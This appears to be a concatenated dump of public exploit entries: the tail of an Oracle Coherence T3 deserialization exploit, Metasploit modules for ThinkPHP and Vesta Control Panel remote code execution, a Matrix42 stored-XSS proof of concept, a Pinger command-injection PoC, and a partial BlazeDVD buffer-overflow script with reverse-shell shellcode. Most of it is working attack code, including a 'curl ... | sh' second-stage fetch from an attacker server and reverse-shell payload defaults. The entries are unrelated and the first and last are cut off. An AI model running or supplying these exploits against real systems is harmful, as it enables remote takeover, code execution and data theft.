payload=payload+'\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78'

payload=struct.pack('>I',len(payload)) + payload[4:]

print '[+] Sending payload...'
sock.send(payload)
data = sock.recv(1024)
print >>sys.stderr, 'received "%s"' % data


[Vendor]
Oracle


[Vulnerability Type]
Network Remote



[Description]
Vulnerability in the Oracle Coherence product of Oracle Fusion Middleware (component: Caching,CacheStore,Invocation).
Supported versions that are affected are 3.7.1.17, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0.
Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle Coherence.
Successful attacks of this vulnerability can result in takeover of Oracle Coherence.
CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).


[Disclosure Timeline]
2019/12/10


[+] Disclaimer
The entry creation date may reflect when the CVE ID was allocated or reserved,
and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.

[Video]
https://www.youtube.com/watch?v=59jt8rr8ECc 

@nu11secur1ty  

-- 

hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
'Name'                    => 'ThinkPHP Multiple PHP Injection RCEs',
'Description'             => %q{
        This module exploits one of two PHP injection vulnerabilities in the
        ThinkPHP web framework to execute code as the web user.

        Versions up to and including 5.0.23 are exploitable, though 5.0.23 is
        vulnerable to a separate vulnerability. The module will automatically
        attempt to detect the version of the software.

        Tested against versions 5.0.20 and 5.0.23 as can be found on Vulhub.
      },
'Author'                  => [
        # Discovery by unknown threaty threat actors
'wvu' # Module
      ],
'References'              => [
        # https://www.google.com/search?q=thinkphp+rce, tbh
        ['CVE', '2018-20062'], # NoneCMS 1.3 using ThinkPHP
        ['CVE', '2019-9082'],  # Open Source BMS 1.1.1 using ThinkPHP
        ['URL', 'https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce'],
        ['URL', 'https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce']
      ],
'DisclosureDate'          => '2018-12-10', # Unknown discovery date
'License'                 => MSF_LICENSE,
'Platform'                => ['unix', 'linux'],
'Arch'                    => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Privileged'              => false,
'Targets'                 => [
        ['Unix Command',
'Platform'            => 'unix',
'Arch'                => ARCH_CMD,
'Type'                => :unix_cmd,
'DefaultOptions'      => {'PAYLOAD' => 'cmd/unix/reverse_netcat'}
        ],
        ['Linux Dropper',
'Platform'            => 'linux',
'Arch'                => [ARCH_X86, ARCH_X64],
'Type'                => :linux_dropper,
'DefaultOptions'      => {
'CMDSTAGER::FLAVOR' => :curl,
'PAYLOAD'           => 'linux/x64/meterpreter/reverse_tcp'
          }
        ]
      ],
'DefaultTarget'           => 1,
'Notes'                   => {
'Stability'             => [CRASH_SAFE],
'Reliability'           => [REPEATABLE_SESSION],
'SideEffects'           => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
      }
    ))

    register_options([
      Opt::RPORT(8080),
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])

    register_advanced_options([
      # NOTE: You may want to tweak this for long-running commands like find(1)
      OptFloat.new('CmdOutputTimeout',
                   [true, 'Timeout for cmd/unix/generic output', 3.5])
    ])

    # XXX: https://github.com/rapid7/metasploit-framework/issues/12963
    import_target_defaults
  end

=begin
  wvu@kharak:~$ curl -vs "http://127.0.0.1:8080/index.php?s=$((RANDOM))" | xmllint --html --xpath 'substring-after(//div[@class = "copyright"]/span[1]/text(), "V")' -
  *   Trying 127.0.0.1...
  * TCP_NODELAY set
  * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
> GET /index.php?s=1353 HTTP/1.1
> Host: 127.0.0.1:8080
> User-Agent: curl/7.54.0
> Accept: */*
>
< HTTP/1.1 404 Not Found
< Date: Mon, 13 Apr 2020 06:42:15 GMT
< Server: Apache/2.4.25 (Debian)
< X-Powered-By: PHP/7.2.5
< Content-Length: 7332
< Content-Type: text/html; charset=utf-8
<
  { [7332 bytes data]
  * Connection #0 to host 127.0.0.1 left intact
  5.0.20wvu@kharak:~$
=end
  def check
    # An unknown route will trigger the ThinkPHP copyright with version
    res = send_request_cgi(
'method'   => 'GET',
'uri'      => normalize_uri(target_uri.path, 'index.php'),
'vars_get' => {'s' => rand_text_alpha(8..42)}
    )

    unless res
      return CheckCode::Unknown('Target did not respond to check request.')
    end

    unless res.code == 404 && res.body.match(/copyright.*ThinkPHP/m)
      return CheckCode::Unknown(
'Target did not respond with ThinkPHP copyright.'
      )
    end

    # Get the first copyright <span> containing the version
    version = res.get_html_document.at('//div[@class = "copyright"]/span')&.text

    unless (version = version.scan(/^V([\d.]+)$/).flatten.first)
      return CheckCode::Detected(
'Target did not respond with ThinkPHP version.'
      )
    end

    # Make the parsed version a comparable ivar for automatic exploitation
    @version = Gem::Version.new(version)

    if @version <= Gem::Version.new('5.0.23')
      return CheckCode::Appears("ThinkPHP #{@version} is a vulnerable version.")
    end

    CheckCode::Safe("ThinkPHP #{@version} is NOT a vulnerable version.")
  end

  def exploit
    # NOTE: Automatic check is implemented by the AutoCheck mixin
    super

    # This is just extra insurance in case I screwed up the check method
    unless @version
      fail_with(Failure::NoTarget, 'Could not detect ThinkPHP version')
    end

    print_status("Targeting ThinkPHP #{@version} automatically")

    case target['Type']
    when :unix_cmd
      execute_command(payload.encoded)
    when :linux_dropper
      # XXX: Only opts[:noconcat] may induce responses from the server
      execute_cmdstager
    else # This is just extra insurance in case I screwed up the info hash
      fail_with(Failure::NoTarget, "Could not select target #{target['Type']}")
    end
  end

  def execute_command(cmd, _opts = {})
    vprint_status("Executing command: #{cmd}")

    if @version < Gem::Version.new('5.0.23')
      exploit_less_than_5_0_23(cmd)
    elsif @version == Gem::Version.new('5.0.23')
      exploit_5_0_23(cmd)
    else # This is just extra insurance in case I screwed up the exploit method
      fail_with(Failure::NoTarget, "Could not target ThinkPHP #{@version}")
    end
  end

=begin
  wvu@kharak:~$ curl -gvs "http://127.0.0.1:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id" | head -1
  *   Trying 127.0.0.1...
  * TCP_NODELAY set
  * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
> GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1
> Host: 127.0.0.1:8080
> User-Agent: curl/7.54.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Mon, 13 Apr 2020 06:43:45 GMT
< Server: Apache/2.4.25 (Debian)
< X-Powered-By: PHP/7.2.5
< Vary: Accept-Encoding
< Transfer-Encoding: chunked
< Content-Type: text/html; charset=UTF-8
<
  { [60 bytes data]
  * Connection #0 to host 127.0.0.1 left intact
  uid=33(www-data) gid=33(www-data) groups=33(www-data)
  wvu@kharak:~$
=end
  def exploit_less_than_5_0_23(cmd)
    # XXX: The server may block on executing our payload and won't respond
    res = send_request_cgi({
'method'      => 'GET',
'uri'         => normalize_uri(target_uri.path, 'index.php'),
'vars_get'    => {
's'         => '/Index/\\think\\app/invokefunction',
'function'  => 'call_user_func_array',
'vars[0]'   => 'system', # TODO: Debug ARCH_PHP
'vars[1][]' => cmd
      },
'partial'     => true
    }, datastore['CmdOutputTimeout'])

    return unless res && res.code == 200

    vprint_good("Successfully executed command: #{cmd}")

    return unless datastore['PAYLOAD'] == 'cmd/unix/generic'

    # HACK: Print half of the doubled-up command output
    vprint_line(res.body[0, res.body.length / 2])
  end

=begin
  wvu@kharak:~$ curl -vsd "_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id" http://127.0.0.1:8081/index.php?s=captcha | head -1
  *   Trying 127.0.0.1...
  * TCP_NODELAY set
  * Connected to 127.0.0.1 (127.0.0.1) port 8081 (#0)
> POST /index.php?s=captcha HTTP/1.1
> Host: 127.0.0.1:8081
> User-Agent: curl/7.54.0
> Accept: */*
> Content-Length: 72
> Content-Type: application/x-www-form-urlencoded
>
  } [72 bytes data]
  * upload completely sent off: 72 out of 72 bytes
< HTTP/1.1 200 OK
< Date: Mon, 13 Apr 2020 06:44:05 GMT
< Server: Apache/2.4.25 (Debian)
< X-Powered-By: PHP/7.2.12
< Vary: Accept-Encoding
< Transfer-Encoding: chunked
< Content-Type: text/html; charset=UTF-8
<
  { [60 bytes data]
  * Connection #0 to host 127.0.0.1 left intact
  uid=33(www-data) gid=33(www-data) groups=33(www-data)
  wvu@kharak:~$
=end
  def exploit_5_0_23(cmd)
    # XXX: The server may block on executing our payload and won't respond
    res = send_request_cgi({
'method'                   => 'POST',
'uri'                      => normalize_uri(target_uri.path, 'index.php'),
'vars_get'                 => {'s' => 'captcha'},
'vars_post'                => {
'_method'                => '__construct',
'filter[]'               => 'system', # TODO: Debug ARCH_PHP
'method'                 => 'get',
'server[REQUEST_METHOD]' => cmd
      },
'partial'                  => true
    }, datastore['CmdOutputTimeout'])

    return unless res && res.code == 200

    vprint_good("Successfully executed command: #{cmd}")

    return unless datastore['PAYLOAD'] == 'cmd/unix/generic'

    # Clean up output from cmd/unix/generic
    vprint_line(res.body.gsub(/\n<!DOCTYPE html>.*/m, ''))
  end

end

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Ftp
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer

  def initialize(info={})
    super(update_info(info,
'Name'           => "Vesta Control Panel Authenticated Remote Code Execution",
'Description'    => %q{
        This module exploits an authenticated command injection vulnerability in the v-list-user-backups
        bash script file in Vesta Control Panel to gain remote code execution as the root user.
      },
'License'        => MSF_LICENSE,
'Author'         =>
        [
'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
        ],
'References'     =>
        [
          ['URL', 'https://pentest.blog/vesta-control-panel-second-order-remote-code-execution-0day-step-by-step-analysis/'],
          ['CVE', '2020-10808']
        ],
'DefaultOptions'  =>
        {
'SSL' => true,
'WfsDelay' => 300,
'Payload' => 'python/meterpreter/reverse_tcp'
        },
'Platform'       => ['python'],
'Arch'           => ARCH_PYTHON,
'Targets'        => [[ 'Automatic', { }]],
'Privileged'     => true,
'DisclosureDate' => "Mar 17 2020",
'DefaultTarget'  => 0,
'Notes'          =>
        {
'Stability'   => [ CRASH_SAFE, ],
'Reliability' => [ FIRST_ATTEMPT_FAIL, ],
'SideEffects' => [ IOC_IN_LOGS, CONFIG_CHANGES, ],
        }
    ))

    register_options(
      [
        Opt::RPORT(8083),
        OptString.new('USERNAME', [true, 'The username to login as']),
        OptString.new('PASSWORD', [true, 'The password to login with']),
        OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])
      ]
    )
    deregister_options('FTPUSER', 'FTPPASS')
  end

  def username
    datastore['USERNAME']
  end

  def password
    datastore['PASSWORD']
  end

  def login
    #
    # This is very simple login process. Nothing important.
    # We will be using cookie and csrf_token across the module as instance variables.
    #
    print_status('Retrieving cookie and csrf token values')
    res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'login', '/'),
    })

    unless res
      fail_with(Failure::Unreachable, 'Target is unreachable.')
    end

    unless res.code == 200
      fail_with(Failure::UnexpectedReply, "Web server error! Expected a HTTP 200 response code, but got #{res.code} instead.")
    end

    if res.get_cookies.empty?
      fail_with(Failure::UnexpectedReply, 'Server returned no HTTP cookies')
    end

    @cookie = res.get_cookies
    @csrf_token = res.body.scan(/<input type="hidden" name="token" value="(.*)">/).flatten[0] || ''

    if @csrf_token.empty?
      fail_with(Failure::UnexpectedReply, 'There is no CSRF token at HTTP response.')
    end

    print_good('Cookie and CSRF token values successfully retrieved')

    print_status('Authenticating to HTTP Service with given credentials')
    res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'login', '/'),
'cookie' => @cookie,
'vars_post' => {
'token'    => @csrf_token,
'user'     => username,
'password' => password
      }
    })

    unless res
      fail_with(Failure::Unreachable, 'Target is unreachable.')
    end

    if res.body.include?('Invalid username or password.')
      fail_with(Failure::NoAccess, 'Credentials are not valid.')
    end

    if res.body.include?('Invalid or missing token')
      fail_with(Failure::UnexpectedReply, 'CSRF Token is wrong.')
    end

    if res.code == 302
      if res.get_cookies.empty?
        fail_with(Failure::UnexpectedReply, 'Server returned no HTTP cookies')
      end
      @cookie = res.get_cookies
    else
      fail_with(Failure::UnexpectedReply, "Web server error! Expected a HTTP 302 response code, but got #{res.code} instead.")
    end

  end

  def start_backup_and_trigger_payload
    #
    # Once a scheduled backup is triggered, the v-backup-user script will be executed.
    # This script will take the file name that we provided and will insert it into backup.conf
    # so that the backup process can be performed correctly.
    #
    # At this point backup.conf should contain our payload, which we can then trigger by browsing
    # to the /list/backup/ URL. Note that one can only trigger the backup (and therefore gain
    # remote code execution) if no other backup processes are currently running.
    #
    # As a result, the exploit will check to see if a backup is currently running. If one is, it will print
    # 'An existing backup is already running' to the console until the existing backup is completed, at which
    # point it will trigger its own backup to trigger the command injection using the malicious command that was
    # inserted into backup.conf

    print_status('Starting scheduled backup. Exploitation may take up to 5 minutes.')

    is_scheduled_backup_running = true

    while is_scheduled_backup_running

      # Trigger the scheduled backup process
      res = send_request_cgi({
'method' => 'GET',
'cookie' => @cookie,
'uri' => normalize_uri(target_uri.path, 'schedule', 'backup', '/'),
      })

      if res && res.code == 302 && res.headers['Location'] =~ /\/list\/backup\//
        # Due to a bug in send_request_cgi we must manually redirect ourselves!
        res = send_request_cgi({
'method' => 'GET',
'cookie' => @cookie,
'uri' => normalize_uri(target_uri.path, 'list', 'backup', '/'),
        })
        if res && res.code == 200
          if res.body.include?('An existing backup is already running. Please wait for that backup to finish.')
            # An existing backup is taking place, so we must wait for it to finish its job!
            print_status('It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...')
            sleep(30)
          elsif res.body.include?('Task has been added to the queue.')
            # Backup process is being initiated
            print_good('Scheduled backup has been started ! ')
          else
            fail_with(Failure::UnexpectedReply, '/list/backup/ is reachable but replied message is unexpected.')
          end
        else
          # The web server couldn't reply to the request within given timeout window because our payload
          # executed in the background. This means that the res object will be 'nil' due to send_request_cgi()
          # timing out, which means our payload executed!
          print_good('Payload appears to have executed in the background. Enjoy the shells <3')
          is_scheduled_backup_running = false
        end
      else
        fail_with(Failure::UnexpectedReply, '/schedule/backup/ is not reachable.')
      end
    end
  end

  def payload_implant
    #
    # Our payload will be placed as a file name on FTP service.
    # Payload length can't be more then 255 and SPACE can't be used because of a
    # bug in the backend software.
    # s
    # Due to these limitations, the payload is fetched using curl before then
    # being executed with perl. This perl script will then fetch the full
    # python payload and execute it.
    #
    final_payload = "curl -sSL #{@second_stage_url} | sh".to_s.unpack("H*").first
    p = "perl${IFS}-e${IFS}'system(pack(qq,H#{final_payload.length},,qq,#{final_payload},))'"

    # Yet another datastore variable overriding.
    if datastore['SSL']
      ssl_restore = true
      datastore['SSL'] = false
    end
    port_restore = datastore['RPORT']
    datastore['RPORT'] = 21
    datastore['FTPUSER'] = username
    datastore['FTPPASS'] = password

    #
    # Connecting to the FTP service with same creds as web ui.
    # Implanting the very first stage of payload as a empty file.
    #
    if (not connect_login)
      fail_with(Failure::NoAccess, 'Unable to authenticate to FTP service')
    end
    print_good('Successfully authenticated to the FTP service')

    res = send_cmd_data(['PUT', ".a';$(#{p});'"], "")
    if res.nil?
      fail_with(Failure::UnexpectedReply, "Failed to upload the payload to FTP server")
    end
    print_good('The file with the payload in the file name has been successfully uploaded.')
    disconnect

    # Revert datastore variables.
    datastore['RPORT'] = port_restore
    datastore['SSL'] = true if ssl_restore
  end

  def exploit
    start_http_server
    payload_implant
    login
    start_backup_and_trigger_payload
    stop_service
  end

  def on_request_uri(cli, request)
    print_good('First stage is executed ! Sending 2nd stage of the payload')
    second_stage = "python -c \"#{payload.encoded}\""
    send_response(cli, second_stage, {'Content-Type'=>'text/html'})
  end

  def start_http_server
    #
    # HttpClient and HttpServer use same SSL variable :(
    # We don't need SSL for payload delivery so we
    # will disable it temporarily.
    #
    if datastore['SSL']
      ssl_restore = true
      datastore['SSL'] = false
    end
    start_service({'Uri' => {
'Proc' => Proc.new { |cli, req|
          on_request_uri(cli, req)
        },
'Path' => resource_uri
    }})
    print_status("Second payload download URI is #{get_uri}")
    # We need to use instance variables since get_uri keeps using
    # the SSL setting from the datastore.
    # Once the URI is retrieved, we will restore the SSL settings within the datastore.
    @second_stage_url = get_uri
    datastore['SSL'] = true if ssl_restore
  end
end

Matrix42 Workspace Management 9.1.2.2765 – Stored Cross-Site Scripting

===============================================================================

Identifiers

-------------------------------------------------

CVE-2019-19500

CVSSv3 score

-------------------------------------------------

9.1 [AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L&version=3.1))

Vendor

-------------------------------------------------

Matrix42 ([https://www.matrix42.com](https://www.matrix42.com/))

Product

-------------------------------------------------

Matrix42 combines the disciplines of Unified Endpoint Management (UEM), Software Asset Management (SAM), Automated Endpoint Security (AES) and Service Management (ITSM). With MyWorkspace, one can use the browser to access data and applications securely regardless of the device. With MX42 Workspace Management, one actively manage devices, applications, processes, and services simple, secure, and compliant. The innovative software seamlessly integrates physical, virtual, mobile and cloud-based workspaces into existing infrastructures.

Affected versions

-------------------------------------------------

 - Workspace Management 9.1.2.2765 and below

Credit

-------------------------------------------------

Christian Pappas, Georg Ph E Heise (@gpheheise) / Lufthansa Industry Solutions (@LHIND_DLH)

Vulnerability summary

-------------------------------------------------

Workspace Management 9.1.2.2765 and below have a stored XSS vulnerability in the comment field for special order. A user can use this to exploit other privileged users eg managers or admins who are viewing excepting the order.

Technical details

------------------------------------------------

The custom field when placing orders is vulnerable to a persistent cross site scripting (XSS) attack.

An Attacker has to intercept the request made by the web application and modify it before submitting it to server.

Proof of concept

-------------------------------------------------

The following evidence is provided to illustrate the existence and

exploitation:

Modify the the custom field for special order similar to this:

"<p><strong>Kali Linux&nbsp;<img src=\"foo\" onerror=\"alert(\'Hacked by Lufthansa Industry Solutions!\')\" width=\"100\" height=\"30\"></strong></p>"},"_type"

POST /m42Services/api/WidgetDialog/UpdateData/88b223a6-0686-c617-1445-08d6df7de1cf HTTP/1.1

Host: foo.bar.de

Connection: close

Content-Length: 1629

Origin: https:/foo.bar.de

mx-application-id: MX_APPLICATION_ID

Accept-Language: de-DE

Authorization: Bearer beARerTokenHere

Content-Type: application/json;charset=UTF-8

Accept: application/json, text/plain, */*

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36

DNT: 1

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: cors

Referer: https://foo.bar.de/wm/app-SelfServicePortal/search-page/subpage

Accept-Encoding: gzip, deflate

Cookie: ASP.NET_SessionId=SESSION_ID

'{"Sys-Entity":"Ud_LHIND_Service_Form_IndividualSoftwareRequestType","ID”:”REQUEST_ID,”Sys-IsNew":false,"Sys-TimeStamp”:”TIMESTA”MP,”Sys-DisplayName":"Formular individuelle Softwareanfrage","Ud_LHIND_Service_Form_IndividualSoftwareRequestClassBase":{"Sys-TimeStamp”:”TIMESTAMP”,”ID":"fIDIDID”,”Software":"test","Description":"<p><strong>Kali Linux&nbsp;<img src=\"foo\" onerror=\"alert(\'Hacked by Lufthansa Industry Solutions!\')\" width=\"100\" height=\"30\"></strong></p>"},"_type":"Ud_LHIND_Service_Form_IndividualSoftwareRequestType","_id”:”IDNUMMER”,”DisplayString":"Formular individuelle Softwareanfrage","_displayName":"Formular individuelle Softwareanfrage","_name":"Formular individuelle Softwareanfrage","IsNew":false,"SPSCommonClassBase":{"Representitives":{"AddedRelations":[],"RemovedRelations":[]},"WorkflowErrors":{"AddedRelations":[],"RemovedRelations":[]},"Tasks":{"AddedRelations":[],"RemovedRelations":[]},"RelatedBackupObject":{"AddedRelations":[],"RemovedRelations":[]},"RelatedDependentObject":{"AddedRelations":[],"RemovedRelations":[]},"ServiceBookings":{"AddedRelations":[],"RemovedRelations":[]},"Bookings":{"AddedRelations":[],"RemovedRelations":[]},"FormForShoppingCarts":{"AddedRelations":[],"RemovedRelations":[]},"Appointments":{"AddedRelations":[],"RemovedRelations":[]},"Memorandums":{"AddedRelations":[],"RemovedRelations":[]},"Service":{"AddedRelations":[],"RemovedRelations":[]},"Orders":{"AddedRelations":[],"RemovedRelations":[]},"ShoppingCarts":{"AddedRelations":[],"RemovedRelations":[]}}}'

`

Solution

-------------------------------------------------

Upgrade to Matrix42 Workspace Management Version 10.0

Timeline

-------------------------------------------------

Date        | Status

------------|-----------------------------

02-DEZ-2019 | Reported to vendor

09-DEZ-2020 | Acknowledged by vendor

31-MAR-2020 | Patch available

14-APR-2020 | Public disclosure

================================================================================
Pinger 1.0 - Simple Pinging Webapp Remote Code Execution
================================================================================
# Vendor Homepage: https://github.com/wcchandler/pinger
# Software Link: https://github.com/wcchandler/pinger
# Date: 2020.04.13
# Author: Milad Karimi
# Contact: miladgrayhat@gmail.com
# Tested on: windows 10 , firefox
# Version: 1.0
# CVE : N/A
================================================================================
# Description:
simple, easy to use jQuery frontend to php backend that pings various
devices and changes colors from green to red depending on if device is
up or down.

# PoC :

http://localhost/pinger/ping.php?ping=;echo '<?php phpinfo(); ?>'>info.php
http://localhost/pinger/ping.php?socket=;echo '<?php phpinfo(); ?>'>info.php


# Vulnerabile code:

    if(isset($_GET['ping'])){
      // if this is ever noticably slower, i'll pass it stuff when called
      // change the good.xml to config.xml, good is what I use at $WORK
      $xml = simplexml_load_file("config.xml");
      //$xml = simplexml_load_file("good.xml");
      if($_GET['ping'] == ""){
        $host = "127.0.0.1";
      }else{
        $host = $_GET['ping'];
      }
      $out = trim(shell_exec('ping -n -q -c 1 -w '.$xml->backend->timeout
                  .''.$host.' | grep received | awk \'{print $4}\''));
      $id = str_replace('.','_',$host);

      if(($out == "1") || ($out == "0")){
        echo json_encode(array("id"=>"h$id","res"=>"$out"));
      }else{
        ## if it returns nothing, assume network is messed up
        echo json_encode(array("id"=>"h$id","res"=>"0"));
      }
    }

    if(isset($_GET['socket'])){
      $xml = simplexml_load_file("config.xml");
      //$xml = simplexml_load_file("good.xml");
      if($_GET['socket'] == ""){
        $host = "127.0.0.1 80";
      }else{
        $host = str_replace(':','',$_GET['socket']);
      }
      $out = shell_exec('nc -v -z -w '.$xml->backend->timeout.''.$host.' 2>&1');
      $id = str_replace('.','_',$host);
      $id = str_replace('','_',$id);
      if(preg_match("/succeeded/",$out)){
        echo json_encode(array("id"=>"h$id","res"=>"1"));
      }else{
        ## if it returns nothing, assume network is messed up
        echo json_encode(array("id"=>"h$id","res"=>"0"));
      }
    }

    ?>

************************
* ==> Contact Me :
* Telegram : @Ex3ptionaL
* Email : miladkarimi311@yahoo.com Email: miladgrayhat@gmail.com
* Instagram : @m.i.l.a.d_._k.a.r.i.m.i
************************ 

# Exploit Title: BlazeDVD 7.0.2 - Buffer Overflow (SEH)
# Date: 2020-04-15
# Exploit Author: areyou1or0 <Busra Demir>
# Software Link: http://www.blazevideo.com/dvd-player/free-dvd-player.html
# Version: 7.0.2
# Tested on: Windows 7 Pro x86

#!/usr/bin/python

file = "exploit.plf"
offset ="A"*(612-4)
nseh = "\xeb\x1e\x90\x90"
seh = "\x34\x31\x02\x64"
nops = "\x90" * 24

#  msfvenom -p windows/shell_reverse_tcp LHOST=3D192.168.8.121 LPORT=8888= -f python  -e x86/alpha_mixed  -b '\x00\x0a\x0d\xff'
shellcode = ""
shellcode += "\x89\xe2\xda\xcc\xd9\x72\xf4\x5a\x4a\x4a\x4a\x4a\x4a"
shellcode += "\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37"
shellcode += "\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
shellcode += "\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
shellcode += "\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x69\x78\x4e\x62"
shellcode += "\x53\x30\x63\x30\x45\x50\x45\x30\x6f\x79\x7a\x45\x46"
shellcode += "\x51\x79\x50\x73\x54\x4c\x4b\x76\x30\x66\x50\x6e\x6b"
